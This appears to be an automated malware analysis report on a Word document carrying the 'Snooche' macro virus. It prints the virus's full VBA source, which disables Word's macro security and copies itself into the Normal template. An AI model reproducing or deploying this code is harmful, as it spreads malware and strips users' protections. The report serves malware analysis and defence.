Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ef1421da32d311b0…

MALICIOUS

Office (OLE)

Size: 32.0 KB
Created: 1998-03-25 18:00:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: ac6565cd27e595978bfbd1dbd55f95c0
SHA-1: 7886b45d6e685b73d3d92193d0cadd658f687ebd
SHA-256: ef1421da32d311b0f33a3af45be55bc9e1b72f2757e2fcb83386a17acfbac540
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The file contains a VBA macro (Document_Close) that attempts to lower Word's macro security: it writes the "Level" value under HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security, disables the "Security..." menu item, and sets Options.VirusProtection = 0 so that macro warnings no longer appear, which would allow further macro code to run unprompted. The macro also copies its own module source into the first VBComponent of the Normal template (or, failing that, of the active document) and renames it "Snooche", a classic macro-virus technique for persisting in every document Word opens. The ClamAV detections 'Win.Trojan.Psycho-3' (on the container) and 'Doc.Trojan.Cash-2' (on the extracted macro) further indicate malicious intent, consistent with trojan behaviour.

Heuristics (2)

  • ClamAV: Win.Trojan.Psycho-3 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1607 bytes
SHA-256: ef8d2a3e6a994c4c955adfaf8378110aecd41235816d3e48da3e5af67b4afc81
Detection: ClamAV: Doc.Trojan.Cash-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Snooche"
Attribute VB_Base = "1Normal.Snooche"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
 On Error Resume Next
 Options.ConfirmConversions = 0
 Options.SaveNormalPrompt = 0
 If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = 0
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
  Else
    CommandBars("Tools").Controls("Macro").Enabled = 0
    Options.VirusProtection = 0
 End If
 Set vc = New DataObject
 Set ab = NormalTemplate.VBProject.VBComponents(1)
 Set cd = ActiveDocument.VBProject.VBComponents(1)
 With Snooche.VBProject.VBComponents(1).CodeModule
   vc.SetText .lines(1, .countoflines)
 End With
 If ab.Name <> "Snooche" Then
   With ab
    .CodeModule.deletelines 1, .CodeModule.countoflines
    .CodeModule.insertlines 1, vc.GetText
    .Name = "Snooche"
   End With
  ElseIf cd.Name <> "Snooche" Then
   With cd
    .CodeModule.deletelines 1, .CodeModule.countoflines
    .CodeModule.insertlines 1, vc.GetText
    .Name = "Snooche"
   End With
 End If
End Sub
    '[][][][][][][][][][][][][][][][][][][]'
    '[]        WM97/WM2K/Snooche         []'
    '[]         Psyclone X /DVC          []'
    '[]   For Educational Purposes Only  []'
    '[][][][][][][][][][][][][][][][][][][]'